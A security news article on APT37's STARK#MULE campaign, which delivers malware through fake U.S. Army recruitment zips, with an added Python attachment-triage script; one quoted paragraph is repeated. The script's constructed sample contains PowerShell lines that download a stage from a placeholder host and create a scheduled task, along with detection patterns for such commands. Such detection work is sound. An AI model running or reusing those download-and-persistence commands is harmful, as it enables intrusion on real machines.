Researchers Say APT37 Group Likely Behind Campaign Targeting South Koreans
Government-backed North Korean hackers are posting convincing U.S. military job recruitment documents to lure Korean-speaking victims into downloading malware staged from legitimate but compromised South Korean websites, according to security researchers.
Due to the targets and type of attack, cybersecurity firm Securonix dubbed this campaign STARK#MULE. It believes that APT37, a North Korean hacking group linked to the Ministry of State Security that focuses on attacking South Korean targets, or a similar organization is likely behind the campaign.
According to a Securonix threat research report published Friday, the lure documents purport to be U.S. Army or military recruitment resources and trick recipients into opening the attached documents, which execute the malware.
Last month, APT37, the state-backed group also known as ScarCruft and Reaper, abused a data transfer and messaging service to plant info-stealing malware with wiretapping capabilities on the devices of targeted South Korea-based individuals, defectors and human rights activists (see: APT37 Exploited Messaging App to Plant Wiretapping Malware).
Researchers said that the entire malicious infrastructure used in the STARK#MULE campaign relies on compromised Korean e-commerce websites, which lets the hackers blend in with normal traffic while evading detection, delivering malware stagers and exercising full command and control over the victim’s machine.
Finally, the attackers install malware on the target’s machine that runs as a scheduled task and immediately begins communicating over HTTP.
Mayuresh Dani, threat research expert at Qualys, told Information Security Media Group that bypassing system controls, evading detection by blending in with legitimate traffic and gaining complete control of an earmarked target, all while staying undetected, make this threat noteworthy.
Mayuresh Dani, threat research expert at Qualys told Information Security Media Group that bypassing system controls, evasion by blending in with legitimate traffic and gaining complete control on an earmarked target – all the while staying undetected – makes this threat noteworthy.
“STARK#MULE also may have laid their hands on a possible zero-day or at least a variant of a known Microsoft Office vulnerability, which allows the threat actors to gain a foothold on the targeted system just by having the targeted user open the attachment,” Dani said.
The attack campaign begins with a phishing email carrying a zip file attachment whose name translates to “U.S. Army job posting website address and how to use it.” Researchers observed that the zip file was not password protected and contained three files.
“Embedded inside another zip file is another zip file named “Multi National Recruitment System Templete.pdf.zip.” The awkward usage of “Multi National” and typos such as “Templete” further solidify that the author was of non-English origin or a possible false-flag attempt,” researchers said.
The second zip file contained a single shortcut file named the same as the PDF file, “Multi National Recruitment System Templete.pdf.lnk.” Researchers are not certain why the attackers zipped the .lnk file into its own zip file: “We’re not quite sure as it does increase the odds that this could be missed in favor of the actual PDF file.”
Researchers said that the shortcut file is where malicious code execution likely began. Instead of embedding the malicious code directly in the shortcut file itself, the hackers had the shortcut run code that simply reads in the contents of one of the other embedded files, called “Thumbs.db.”
“Thumbs.db” is a legitimate file that simply stores image thumbnails and allows user-friendly browsing and “scrolling experience in Windows Explorer versus having to analyze media files and display a thumbnail image each time you open a directory.”
In this campaign, the Thumbs.db file did not store any image thumbnails. Instead, it contained PowerShell code that the shortcut file executed, which performs several functions including downloading further stagers and establishing persistence.
“Throughout the code, the Thumbs.db script contains useless variables named $a and $b, which set themselves to useless, repeating Base64 strings. This is likely an attempt to pad the script in order to evade AV detections, however, the actual malicious code is completely unobfuscated,” researchers said.
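The attachment layout described above (a zip nesting a second zip, a shortcut with a double `.pdf.lnk` extension, and a Thumbs.db that holds PowerShell instead of thumbnails, padded with junk Base64 variables) lends itself to a simple mail-gateway triage check. The following Python script is an added example written for this article; it is not Securonix's code and the sample archive it scans is constructed here to mirror the reported structure, not the real files. It assumes that a genuine Thumbs.db is an OLE2 compound document (magic `D0 CF 11 E0 A1 B1 1A E1`) and that a Windows shortcut begins with the ShellLink header size `4C 00 00 00`; the PowerShell keywords and padding pattern it searches for are illustrative, not indicators taken from the report.

```python
"""Triage a suspected STARK#MULE-style attachment: nested zips, a .pdf.lnk
shortcut, and a Thumbs.db that is really a PowerShell script.
Example code added to this article; not Securonix's tooling."""
from __future__ import annotations

import io
import re
import zipfile

# Genuine Thumbs.db files are OLE2 compound documents and start with this magic.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Windows shortcut (.lnk) files start with the ShellLink HeaderSize field 0x4C.
LNK_MAGIC = b"\x4c\x00\x00\x00"

# Document-looking name that is actually a shortcut, e.g. "x.pdf.lnk".
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png)\.lnk$", re.I)
# Illustrative PowerShell download/persistence markers (assumption, not IOCs).
PS_MARKERS = re.compile(
    rb"(Invoke-WebRequest|IEX|Invoke-Expression|DownloadString|"
    rb"schtasks|New-ScheduledTask|FromBase64String)", re.I)
# Junk padding like  $a = "QUFBQUFB..."  that carries no logic.
PAD_VAR = re.compile(rb'\$[a-z]\s*=\s*"[A-Za-z0-9+/=]{40,}"', re.I)


def scan_zip(data: bytes, depth: int = 0, prefix: str = "") -> list[str]:
    """Return findings for a zip, recursing up to three levels into nested zips."""
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = prefix + info.filename
            content = zf.read(info)
            if info.filename.lower().endswith(".zip") and depth < 3:
                findings.append(f"nested zip: {name}")
                findings += scan_zip(content, depth + 1, name + "/")
                continue
            if DOUBLE_EXT.search(info.filename) or content.startswith(LNK_MAGIC):
                findings.append(f"shortcut masquerading as document: {name}")
            if info.filename.lower() == "thumbs.db":
                if not content.startswith(OLE_MAGIC):
                    findings.append(f"Thumbs.db is not an OLE thumbnail cache: {name}")
                if PS_MARKERS.search(content):
                    findings.append(f"PowerShell markers inside Thumbs.db: {name}")
                if PAD_VAR.search(content):
                    findings.append(f"Base64 padding variables inside Thumbs.db: {name}")
    return findings


def build_sample() -> bytes:
    """Constructed malicious-looking sample mirroring the reported layout."""
    fake_ps = (b'$a = "' + b"QUFB" * 20 + b'"\r\n'
               b'$b = "' + b"QUFB" * 20 + b'"\r\n'
               b"$u = 'http://example.invalid/stage2'\r\n"
               b"IEX (New-Object Net.WebClient).DownloadString($u)\r\n"
               b"schtasks /create /sc minute /mo 5 /tn Updater /tr powershell.exe\r\n")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        # Fake shortcut: correct header, otherwise empty (constructed).
        z.writestr("Multi National Recruitment System Templete.pdf.lnk",
                   LNK_MAGIC + b"\x00" * 72)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Multi National Recruitment System Templete.pdf.zip", inner.getvalue())
        z.writestr("Thumbs.db", fake_ps)
        z.writestr("readme.txt", b"see attached")
    return outer.getvalue()


def build_benign_sample() -> bytes:
    """Constructed benign zip: a real-looking Thumbs.db header and a plain PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Thumbs.db", OLE_MAGIC + b"\x00" * 504)
        z.writestr("recruitment.pdf", b"%PDF-1.4\n%fake\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample()):
        print(finding)
```

The nested-zip recursion matters because the shortcut sits one layer down, where a gateway that inspects only top-level entries would miss it; the OLE-magic check catches a forged Thumbs.db even if the PowerShell inside it uses keywords the marker list does not cover.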
In May, APT37 used the same technique to plant wiretapping malware via a backdoor that abused Ably, a commercial instant messaging, data synchronization and data transfer platform.
According to ASEC researchers, once the AblyGo backdoor executes on an infected device, APT37 determines the device’s ID and sends additional commands via cmd to run further malware, including a fileless info-stealer ASEC dubbed FadeStealer, which can take screenshots, log keystrokes, exfiltrate data and wiretap microphones.